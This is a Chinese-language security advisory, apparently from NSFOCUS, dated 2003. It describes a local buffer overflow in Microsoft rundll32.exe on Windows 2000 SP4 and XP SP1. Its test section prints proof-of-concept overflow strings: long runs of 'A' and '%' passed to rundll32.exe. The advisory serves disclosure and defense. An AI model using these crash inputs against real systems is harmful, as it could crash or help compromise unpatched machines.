安全研究

安全漏洞
Microsoft rundll32.exe本地缓冲区溢出漏洞

发布日期:2003-07-06
更新日期:2003-07-11

受影响系统:
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
描述:
BUGTRAQ  ID: 8114

Microsoft Windows是微软开发的视窗操作系统。

Microsoft Windows 包含的rundll32.exe对用户提交的参数缺少充分检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。

当超长字符串作为参数提交给rundll32.exe执行时,会发生溢出,可能以高权限在系统上执行任意指令。

<*来源:Rick Patel (rikul@bellsouth.net
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105770180515783&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Rick Patel (rikul@bellsouth.net)提供了如下测试方法:

rundll32.exe  advpack32.dll,<'A'x499>

在采用SP4补丁的系统中,下面的方法可以导致溢出:

C:\WINNT\system32>rundll32.exe
rundll32.exe,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% <-- crashes 0x00250025...

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:4089
严重程度:20(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障